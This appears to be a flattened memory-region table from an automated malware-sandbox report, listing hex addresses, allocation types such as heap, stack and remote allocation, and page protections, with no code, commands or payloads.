heap
|
page read and write
|
||
|
23FF0000
|
trusted library allocation
|
page read and write
|
||
|
21D30000
|
heap
|
page read and write
|
||
|
2190D3BE000
|
heap
|
page read and write
|
||
|
12C8052B000
|
trusted library allocation
|
page read and write
|
||
|
12C80675000
|
trusted library allocation
|
page read and write
|
||
|
2A20000
|
trusted library allocation
|
page read and write
|
||
|
12C80227000
|
trusted library allocation
|
page read and write
|
||
|
187564B000
|
stack
|
page read and write
|
||
|
12C81DB7000
|
trusted library allocation
|
page read and write
|
||
|
8C10000
|
direct allocation
|
page execute and read and write
|
||
|
23FF0000
|
trusted library allocation
|
page read and write
|
||
|
A60000
|
heap
|
page read and write
|
||
|
12CF6313000
|
heap
|
page read and write
|
||
|
4D9D000
|
trusted library allocation
|
page read and write
|
||
|
8460000
|
trusted library allocation
|
page read and write
|
||
|
24600000
|
trusted library allocation
|
page read and write
|
||
|
22D69000
|
trusted library allocation
|
page read and write
|
||
|
24070000
|
heap
|
page read and write
|
||
|
4FE000
|
stack
|
page read and write
|
||
|
7FF887100000
|
trusted library allocation
|
page read and write
|
||
|
A00000
|
heap
|
page read and write
|
||
|
8430000
|
trusted library allocation
|
page read and write
|
||
|
21BDC000
|
stack
|
page read and write
|
||
|
12CF6050000
|
heap
|
page readonly
|
||
|
23E50000
|
trusted library allocation
|
page read and write
|
||
|
2190EE46000
|
heap
|
page read and write
|
||
|
12CF67E0000
|
heap
|
page read and write
|
||
|
12C9000F000
|
trusted library allocation
|
page read and write
|
||
|
21A70000
|
direct allocation
|
page read and write
|
||
|
24172000
|
heap
|
page read and write
|
||
|
F09000
|
trusted library allocation
|
page read and write
|
||
|
2A5A000
|
trusted library allocation
|
page execute and read and write
|
||
|
23FB6000
|
trusted library allocation
|
page read and write
|
||
|
4520000
|
trusted library allocation
|
page read and write
|
||
|
59E000
|
unkown
|
page read and write
|
||
|
23FE0000
|
trusted library allocation
|
page read and write
|
||
|
2190EE00000
|
heap
|
page read and write
|
||
|
7FF887030000
|
trusted library allocation
|
page read and write
|
||
|
21D00000
|
trusted library allocation
|
page read and write
|
||
|
21D00000
|
trusted library allocation
|
page read and write
|
||
|
5204000
|
remote allocation
|
page execute and read and write
|
||
|
2190D2FE000
|
heap
|
page read and write
|
||
|
6333000
|
heap
|
page read and write
|
||
|
2190EDF4000
|
heap
|
page read and write
|
||
|
23FAA000
|
trusted library allocation
|
page read and write
|
||
|
8550000
|
direct allocation
|
page read and write
|
||
|
7FF886FC0000
|
trusted library allocation
|
page read and write
|
||
|
A134000
|
direct allocation
|
page execute and read and write
|
||
|
6B30000
|
direct allocation
|
page read and write
|
||
|
245F0000
|
trusted library allocation
|
page read and write
|
||
|
2190D3AB000
|
heap
|
page read and write
|
||
|
12C80578000
|
trusted library allocation
|
page read and write
|
||
|
12C81FC8000
|
trusted library allocation
|
page read and write
|
||
|
2190F24D000
|
heap
|
page read and write
|
||
|
12CF6977000
|
heap
|
page read and write
|
||
|
24010000
|
trusted library allocation
|
page read and write
|
||
|
2190EE11000
|
heap
|
page read and write
|
||
|
44DC000
|
stack
|
page read and write
|
||
|
7F1B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21BF0000
|
trusted library allocation
|
page read and write
|
||
|
2190D330000
|
heap
|
page read and write
|
||
|
23FAE000
|
trusted library allocation
|
page read and write
|
||
|
24060000
|
heap
|
page execute and read and write
|
||
|
2190D353000
|
heap
|
page read and write
|
||
|
7F40000
|
trusted library allocation
|
page read and write
|
||
|
24187000
|
heap
|
page read and write
|
||
|
2190D3A8000
|
heap
|
page read and write
|
||
|
4D9F000
|
trusted library allocation
|
page read and write
|
||
|
12C8097D000
|
trusted library allocation
|
page read and write
|
||
|
21D00000
|
trusted library allocation
|
page read and write
|
||
|
23FD0000
|
trusted library allocation
|
page read and write
|
||
|
2190F27D000
|
heap
|
page read and write
|
||
|
2190F255000
|
heap
|
page read and write
|
||
|
2357E9A5000
|
heap
|
page read and write
|
||
|
5E0000
|
heap
|
page read and write
|
||
|
2357E700000
|
heap
|
page read and write
|
||
|
245EC000
|
stack
|
page read and write
|
||
|
12C9030C000
|
trusted library allocation
|
page read and write
|
||
|
21680000
|
heap
|
page read and write
|
||
|
2190EE04000
|
heap
|
page read and write
|
||
|
12CF697A000
|
heap
|
page read and write
|
||
|
23DFE000
|
stack
|
page read and write
|
||
|
4804000
|
remote allocation
|
page execute and read and write
|
||
|
2190D3BB000
|
heap
|
page read and write
|
||
|
7FF886F60000
|
trusted library allocation
|
page execute and read and write
|
There are 715 hidden memdumps, click here to show them.